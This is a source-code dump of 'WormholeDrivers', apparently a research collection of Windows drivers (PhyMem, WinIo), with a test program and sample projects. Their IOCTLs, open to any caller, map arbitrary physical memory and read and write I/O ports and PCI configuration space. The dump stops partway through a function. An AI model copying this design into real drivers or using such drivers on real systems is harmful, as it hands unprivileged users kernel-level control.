10 | /* GetBusInterface: asks the device stack at pcifido for the PCI bus interface by sending a synchronous IRP_MJ_PNP / IRP_MN_QUERY_INTERFACE request for GUID_PCI_BUS_INTERFACE_STANDARD. pcifido: device object the request is sent to; NULL yields STATUS_UNSUCCESSFUL. busInterface: caller-supplied PCI_BUS_INTERFACE_STANDARD handed to the lower driver as the QueryInterface.Interface buffer, with Size set to sizeof(PCI_BUS_INTERFACE_STANDARD). Returns STATUS_INSUFFICIENT_RESOURCES when the IRP cannot be built, otherwise the status of the request. NOTE(review): the function waits without a timeout and uses IoBuildSynchronousFsdRequest, so it presumably has to run at PASSIVE_LEVEL - confirm at the call sites. NOTE(review): nothing here releases the returned interface; on success the caller is presumably expected to call its InterfaceDereference routine when done - confirm. */ NTSTATUS GetBusInterface(IN PDEVICE_OBJECT pcifido, 11 | OUT PPCI_BUS_INTERFACE_STANDARD busInterface) 12 | { 13 | KEVENT event; 14 | NTSTATUS ntStatus; 15 | PIRP irp; 16 | IO_STATUS_BLOCK ioStatus; 17 | PIO_STACK_LOCATION irpStack; 18 | 19 | if (pcifido==NULL) 20 | return STATUS_UNSUCCESSFUL; 21 | 22 | KeInitializeEvent(&event, NotificationEvent, FALSE); 23 | 24 | irp=IoBuildSynchronousFsdRequest(IRP_MJ_PNP, 25 | pcifido, 26 | NULL, 27 | 0, 28 | NULL, 29 | &event, 30 | &ioStatus); 31 | 32 | if (irp==NULL) 33 | { 34 | return STATUS_INSUFFICIENT_RESOURCES; 35 | } 36 | 37 | irpStack=IoGetNextIrpStackLocation(irp); 38 | irpStack->MinorFunction=IRP_MN_QUERY_INTERFACE; 39 | irpStack->Parameters.QueryInterface.InterfaceType=(LPGUID)&GUID_PCI_BUS_INTERFACE_STANDARD; 40 | irpStack->Parameters.QueryInterface.Size=sizeof(PCI_BUS_INTERFACE_STANDARD); 41 | irpStack->Parameters.QueryInterface.Version=PCI_BUS_INTERFACE_STANDARD_VERSION; 42 | irpStack->Parameters.QueryInterface.Interface=(PINTERFACE)busInterface; 43 | irpStack->Parameters.QueryInterface.InterfaceSpecificData=NULL; 44 | 45 | //initialize the status to error in case the bus driver does not 46 | //set it correctly.
47 | irp->IoStatus.Status=STATUS_NOT_SUPPORTED ; 48 | 49 | /* Send the request down; a return value other than STATUS_PENDING is used as the result directly. */ ntStatus=IoCallDriver(pcifido, irp); 50 | 51 | if (ntStatus==STATUS_PENDING) 52 | { 53 | /* Untimed wait on the event that was passed to IoBuildSynchronousFsdRequest, then take the final status from ioStatus. */ KeWaitForSingleObject(&event, Executive, KernelMode, FALSE, NULL); 54 | 55 | ntStatus=ioStatus.Status; 56 | } 57 | 58 | return ntStatus; 59 | } 60 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.c -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.h -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/driver/phymem.dsw: -------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 
3 | 4 | ############################################################################### 5 | 6 | Project: "phymem"=.\phymem.dsp - Package Owner=<4> 7 | 8 | Package=<5> 9 | {{{ 10 | }}} 11 | 12 | Package=<4> 13 | {{{ 14 | }}} 15 | 16 | ############################################################################### 17 | 18 | Global: 19 | 20 | Package=<5> 21 | {{{ 22 | }}} 23 | 24 | Package=<3> 25 | {{{ 26 | }}} 27 | 28 | ############################################################################### 29 | 30 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/driver/phymem.h: -------------------------------------------------------------------------------- 1 | #ifndef __PHYMEM_H 2 | #define __PHYMEM_H 3 | 4 | #define FILE_DEVICE_PHYMEM 0x8000 5 | 6 | #define IOCTL_PHYMEM_MAP \ 7 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x800,\ 8 | METHOD_BUFFERED, FILE_ANY_ACCESS) 9 | 10 | #define IOCTL_PHYMEM_UNMAP \ 11 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x801,\ 12 | METHOD_BUFFERED, FILE_ANY_ACCESS) 13 | 14 | #define IOCTL_PHYMEM_GETPORT \ 15 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x802,\ 16 | METHOD_BUFFERED, FILE_ANY_ACCESS) 17 | 18 | #define IOCTL_PHYMEM_SETPORT \ 19 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x803,\ 20 | METHOD_BUFFERED, FILE_ANY_ACCESS) 21 | 22 | #define IOCTL_PHYMEM_GETPCI \ 23 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x804,\ 24 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS) 25 | 26 | #define IOCTL_PHYMEM_SETPCI \ 27 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x805,\ 28 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS) 29 | 30 | typedef struct tagPHYMEM_MEM 31 | { 32 | PVOID pvAddr; //physical addr when mapping, virtual addr when unmapping 33 | ULONG dwSize; //memory size to map or unmap 34 | } PHYMEM_MEM, *PPHYMEM_MEM; 35 | 36 | typedef struct tagPHYMEM_PORT 37 | { 38 | ULONG dwPort; //port number: 0-0xFFFF 39 | ULONG dwSize; //must be 1, 2, 4 40 | ULONG dwValue; //new value to set 41 | } PHYMEM_PORT, *PPHYMEM_PORT; 42 | 43 | typedef struct tagPHYMEM_PCI 44 | { 45 | 
ULONG dwBusNum; //bus number: 0-255 46 | ULONG dwDevNum; //device number: 0-31 47 | ULONG dwFuncNum; //function number: 0-7 48 | ULONG dwRegOff; //register offset: 0-255 49 | ULONG dwBytes; //bytes to read or write 50 | } PHYMEM_PCI, *PPHYMEM_PCI; 51 | 52 | #endif //__PHYMEM_H 53 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/pmdll/Release/pmdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/Release/pmdll.lib -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/pmdll/phymem.h: -------------------------------------------------------------------------------- 1 | #ifndef __PHYMEM_H 2 | #define __PHYMEM_H 3 | 4 | #define FILE_DEVICE_PHYMEM 0x8000 5 | 6 | #define IOCTL_PHYMEM_MAP \ 7 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x800,\ 8 | METHOD_BUFFERED, FILE_ANY_ACCESS) 9 | 10 | #define IOCTL_PHYMEM_UNMAP \ 11 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x801,\ 12 | METHOD_BUFFERED, FILE_ANY_ACCESS) 13 | 14 | #define IOCTL_PHYMEM_GETPORT \ 15 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x802,\ 16 | METHOD_BUFFERED, FILE_ANY_ACCESS) 17 | 18 | #define IOCTL_PHYMEM_SETPORT \ 19 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x803,\ 20 | METHOD_BUFFERED, FILE_ANY_ACCESS) 21 | 22 | #define IOCTL_PHYMEM_GETPCI \ 23 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x804,\ 24 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS) 25 | 26 | #define IOCTL_PHYMEM_SETPCI \ 27 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x805,\ 28 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS) 29 | 30 | typedef struct tagPHYMEM_MEM 31 | { 32 | PVOID pvAddr; //physical addr when mapping, virtual addr when unmapping 33 | ULONG dwSize; //memory size to map or unmap 34 | } PHYMEM_MEM, *PPHYMEM_MEM; 35 | 36 | typedef struct tagPHYMEM_PORT 37 | { 38 | ULONG dwPort; //port number: 0-0xFFFF 39 | ULONG dwSize; 
//must be 1, 2, 4 40 | ULONG dwValue; //new value to set 41 | } PHYMEM_PORT, *PPHYMEM_PORT; 42 | 43 | typedef struct tagPHYMEM_PCI 44 | { 45 | ULONG dwBusNum; //bus number: 0-255 46 | ULONG dwDevNum; //device number: 0-31 47 | ULONG dwFuncNum; //function number: 0-7 48 | ULONG dwRegOff; //register offset: 0-255 49 | ULONG dwBytes; //bytes to read or write 50 | } PHYMEM_PCI, *PPHYMEM_PCI; 51 | 52 | #endif //__PHYMEM_H 53 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/pmdll/pmdll.dsw: -------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 3 | 4 | ############################################################################### 5 | 6 | Project: "pmdll"=.\pmdll.dsp - Package Owner=<4> 7 | 8 | Package=<5> 9 | {{{ 10 | }}} 11 | 12 | Package=<4> 13 | {{{ 14 | }}} 15 | 16 | ############################################################################### 17 | 18 | Global: 19 | 20 | Package=<5> 21 | {{{ 22 | }}} 23 | 24 | Package=<3> 25 | {{{ 26 | }}} 27 | 28 | ############################################################################### 29 | 30 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/pmdll/pmdll.h: -------------------------------------------------------------------------------- 1 | #ifndef __PMDLL_H 2 | #define __PMDLL_H 3 | 4 | #ifdef PMDLL_EXPORTS 5 | #define DLL_DECLARE __declspec(dllexport) 6 | #else 7 | #define DLL_DECLARE __declspec(dllimport) 8 | #endif 9 | 10 | #ifdef __cplusplus 11 | extern "C" 12 | { 13 | #endif 14 | 15 | //driver initialize 16 | DLL_DECLARE BOOL LoadPhyMemDriver(); 17 | DLL_DECLARE VOID UnloadPhyMemDriver(); 18 | 19 | //map physical memory to user space 20 | DLL_DECLARE PVOID MapPhyMem(DWORD phyAddr, DWORD memSize); 21 | DLL_DECLARE VOID 
UnmapPhyMem(PVOID pVirAddr, DWORD memSize); 22 | 23 | //access port 24 | DLL_DECLARE BYTE ReadPortByte(WORD portAddr); 25 | DLL_DECLARE WORD ReadPortWord(WORD portAddr); 26 | DLL_DECLARE DWORD ReadPortLong(WORD portAddr); 27 | DLL_DECLARE VOID WritePortByte(WORD portAddr, BYTE portValue); 28 | DLL_DECLARE VOID WritePortWord(WORD portAddr, WORD portValue); 29 | DLL_DECLARE VOID WritePortLong(WORD portAddr, DWORD portValue); 30 | 31 | //access PCI bus 32 | DLL_DECLARE BOOL ReadPCI(DWORD busNum, DWORD devNum, DWORD funcNum, 33 | DWORD regOff, DWORD bytes, PVOID pValue); 34 | DLL_DECLARE BOOL WritePCI(DWORD busNum, DWORD devNum, DWORD funcNum, 35 | DWORD regOff, DWORD bytes, PVOID pValue); 36 | 37 | #ifdef __cplusplus 38 | } 39 | #endif 40 | 41 | #endif //__PMDLL_H -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.h: -------------------------------------------------------------------------------- 1 | #ifndef __PMDLL_H 2 | #define __PMDLL_H 3 | 4 | #ifdef PMDLL_EXPORTS 5 | #define DLL_DECLARE __declspec(dllexport) 6 | #else 7 | #define DLL_DECLARE __declspec(dllimport) 8 | #endif 9 | 10 | #ifdef __cplusplus 11 | extern "C" 12 | { 13 | #endif 14 | 15 | //driver initialize 16 | DLL_DECLARE BOOL LoadPhyMemDriver(); 17 | DLL_DECLARE VOID UnloadPhyMemDriver(); 18 | 19 | //map physical memory to user space 20 | DLL_DECLARE PVOID MapPhyMem(DWORD phyAddr, DWORD memSize); 21 | DLL_DECLARE VOID UnmapPhyMem(PVOID pVirAddr, DWORD memSize); 22 | 23 | //access port 24 | DLL_DECLARE BYTE ReadPortByte(WORD portAddr); 25 | DLL_DECLARE WORD ReadPortWord(WORD portAddr); 26 | DLL_DECLARE DWORD ReadPortLong(WORD portAddr); 27 | DLL_DECLARE VOID WritePortByte(WORD portAddr, BYTE portValue); 28 | DLL_DECLARE VOID WritePortWord(WORD portAddr, WORD portValue); 29 | DLL_DECLARE VOID WritePortLong(WORD portAddr, DWORD portValue); 30 | 31 | //access PCI bus 32 | DLL_DECLARE BOOL ReadPCI(DWORD busNum, DWORD devNum, 
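DWORD funcNum,
33 | 					DWORD regOff, DWORD bytes, PVOID pValue);
34 | DLL_DECLARE BOOL WritePCI(DWORD busNum, DWORD devNum, DWORD funcNum,
35 | 					DWORD regOff, DWORD bytes, PVOID pValue);
36 |
37 | #ifdef __cplusplus
38 | }
39 | #endif
40 |
41 | #endif	//__PMDLL_H
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.lib
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/test.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include "pmdll.h"
5 |
/*
 * Smoke test for the pmdll wrapper: loads the phymem driver, maps and unmaps
 * a 20-byte physical range, then walks every PCI bus (0-255), device (0-31)
 * and function (0-7) and prints the vendor and device ID of each function
 * whose vendor ID is not 0xFFFF.
 *
 * Exits with -1 when the driver cannot be loaded; returns 0 otherwise.
 */
int main()
{
	BOOL b=LoadPhyMemDriver();

	if (b==FALSE)
	{
		printf("load phymem.sys failed\n");
		exit(-1);
	}

	//map 20 bytes at physical address 0xF7020, report where they landed, unmap
	char *va=(char*)MapPhyMem(0xF7020, 20);
	if (va!=NULL)	//assumes MapPhyMem reports failure as NULL - confirm in pmdll
	{
		//%p prints the whole pointer; the former 0x%08x was handed a pointer
		//where an unsigned int is expected and truncated it on 64-bit builds
		printf("mapped virtual address = %p\n", (void*)va);
		UnmapPhyMem(va, 20);
	}
	else
	{
		printf("map physical memory failed\n");
	}

	/*
	DWORD d=ReadPortByte(0x379);
	WritePortLong(0x378, 10);
	d=ReadPortLong(0x378);
	*/

	//enumerate PCI bus
	for (int bus=0; bus<=255; bus++)
	{
		for (int dev=0; dev<=31; dev++)
		{
			for (int func=0; func<=7; func++)
			{
				//first config dword: vendor ID in the low word, device ID in the high word
				DWORD dev_ven;
				if (ReadPCI(bus, dev, func, 0, 4, &dev_ven))
				{
					//a vendor ID of 0xFFFF is skipped
					if (LOWORD(dev_ven)!=0xFFFF)
						printf("Bus %d, Device %d, Function %d, Vendor ID 0x%x, Device ID 0x%x\n",
							bus, dev, func, LOWORD(dev_ven), HIWORD(dev_ven));
				}
			}
		}
	}

	printf("end");
	getchar();

	UnloadPhyMemDriver();
	return 0;
}

--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/test.dsw: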
-------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 3 | 4 | ############################################################################### 5 | 6 | Project: "test"=.\test.dsp - Package Owner=<4> 7 | 8 | Package=<5> 9 | {{{ 10 | }}} 11 | 12 | Package=<4> 13 | {{{ 14 | }}} 15 | 16 | ############################################################################### 17 | 18 | Global: 19 | 20 | Package=<5> 21 | {{{ 22 | }}} 23 | 24 | Package=<3> 25 | {{{ 26 | }}} 27 | 28 | ############################################################################### 29 | 30 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | 34 | # Ignore vscode files 35 | .vscode -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual Studio 2008 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DumpPhys", "DumpPhys\DumpPhys.csproj", "{1103585F-D85D-4599-8858-C0D3E9D7419F}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Any CPU = Debug|Any CPU 9 | Debug|x86 = Debug|x86 10 | Release|Any 
CPU = Release|Any CPU 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|x86.ActiveCfg = Debug|x86 17 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|x86.Build.0 = Debug|x86 18 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|Any CPU.Build.0 = Release|Any CPU 20 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|x86.ActiveCfg = Release|x86 21 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|x86.Build.0 = Release|x86 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.suo -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/DumpPhys.manifest: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Windows.Forms; 4 | 5 | namespace DumpPhys 6 | { 7 | static class Program 8 | { 9 | /// 10 | /// The main entry 
point for the application. 11 | /// 12 | [STAThread] 13 | static void Main() 14 | { 15 | Application.EnableVisualStyles(); 16 | Application.SetCompatibleTextRenderingDefault(false); 17 | Application.Run(new Form1()); 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("DumpPhys")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("www.internals.com")] 12 | [assembly: AssemblyProduct("DumpPhys")] 13 | [assembly: AssemblyCopyright("Copyright © Yariv Kaplan 2010")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("16fd1afb-d769-4e14-89ba-eef3670c272b")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | [assembly: AssemblyVersion("1.0.0.0")] 33 | [assembly: AssemblyFileVersion("1.0.0.0")] 34 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:2.0.50727.4927 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 
8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace DumpPhys.Properties { 12 | 13 | 14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")] 16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase { 17 | 18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 19 | 20 | public static Settings Default { 21 | get { 22 | return defaultInstance; 23 | } 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual Studio 2008 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DumpPort", "DumpPort\DumpPort.csproj", "{8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Any CPU = Debug|Any CPU 9 | Debug|x86 = Debug|x86 10 | Release|Any CPU = Release|Any CPU 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | 
{8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|x86.ActiveCfg = Debug|x86 17 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|x86.Build.0 = Debug|x86 18 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|Any CPU.Build.0 = Release|Any CPU 20 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|x86.ActiveCfg = Release|x86 21 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|x86.Build.0 = Release|x86 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.suo -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/DumpPort.manifest: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Windows.Forms; 4 | 5 | namespace DumpPort 6 | { 7 | static class Program 8 | { 9 | /// 10 | /// The main entry point for the application. 
11 | /// 12 | [STAThread] 13 | static void Main() 14 | { 15 | Application.EnableVisualStyles(); 16 | Application.SetCompatibleTextRenderingDefault(false); 17 | Application.Run(new Form1()); 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("DumpPort")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("www.internals.com")] 12 | [assembly: AssemblyProduct("DumpPort")] 13 | [assembly: AssemblyCopyright("Copyright © Yariv Kaplan 2010")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("e4aa10c8-3c4e-4ea5-8461-4da84bf602f5")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | [assembly: AssemblyVersion("1.0.0.0")] 33 | [assembly: AssemblyFileVersion("1.0.0.0")] 34 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:2.0.50727.4927 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 
8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace DumpPort.Properties { 12 | 13 | 14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")] 16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase { 17 | 18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 19 | 20 | public static Settings Default { 21 | get { 22 | return defaultInstance; 23 | } 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/Phys32.cpp: -------------------------------------------------------------------------------- 1 | // ---------------------------------------------------- // 2 | // WinIo v3.0 // 3 | // Direct Hardware Access Under Windows // 4 | // Copyright 1998-2010 Yariv Kaplan // 5 | // http://www.internals.com // 6 | // ---------------------------------------------------- // 7 | 8 | #include 9 | #include 10 | #include "phys32.h" 11 | #include "..\drv\winio_nt.h" 12 | #include "winio.h" 13 | 14 | 15 | PBYTE _stdcall MapPhysToLin(tagPhysStruct &PhysStruct) 16 | { 17 | PBYTE pbLinAddr = NULL; 18 | DWORD dwBytesReturned; 19 | 20 | if (!IsWinIoInitialized) 21 | return false; 22 | 23 | if (!DeviceIoControl(hDriver, IOCTL_WINIO_MAPPHYSTOLIN, &PhysStruct, 24 | sizeof(tagPhysStruct), &PhysStruct, sizeof(tagPhysStruct), 25 | &dwBytesReturned, NULL)) 26 | { 27 | return 
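NULL;
28 |   }
29 |
30 |   return (PBYTE)PhysStruct.pvPhysMemLin;
31 | }
32 |
33 |
// Releases a mapping previously created by MapPhysToLin.
// PhysStruct is passed to the driver as the input buffer of
// IOCTL_WINIO_UNMAPPHYSADDR; no output buffer is requested.
// Returns false when the library is not initialized or the IOCTL fails.
bool _stdcall UnmapPhysicalMemory(tagPhysStruct &PhysStruct)
{
  DWORD dwBytesReturned;

  if (!IsWinIoInitialized)
  {
    return false;
  }

  if (!DeviceIoControl(hDriver, IOCTL_WINIO_UNMAPPHYSADDR, &PhysStruct,
                       sizeof(tagPhysStruct), NULL, 0, &dwBytesReturned, NULL))
  {
    return false;
  }

  return true;
}

// Support functions

// Reads one DWORD from physical address pbPhysAddr into *pdwPhysVal by
// mapping 4 bytes through the driver, copying the value and unmapping again.
// Returns false when the library is not initialized, pdwPhysVal is NULL or
// the mapping fails.
//
// The address is forwarded as given: nothing in this function restricts which
// physical range may be read, so any such limit has to be enforced by the
// driver (not shown here) and by who is allowed to open its device.
bool _stdcall GetPhysLong(PBYTE pbPhysAddr, PDWORD pdwPhysVal)
{
  PDWORD pdwLinAddr;
  // Zero the request so the fields this function does not set reach the
  // driver as 0 rather than as leftover stack bytes.
  tagPhysStruct PhysStruct = {0};

  if (!IsWinIoInitialized)
    return false;

  // Nothing to store the result in.
  if (pdwPhysVal == NULL)
    return false;

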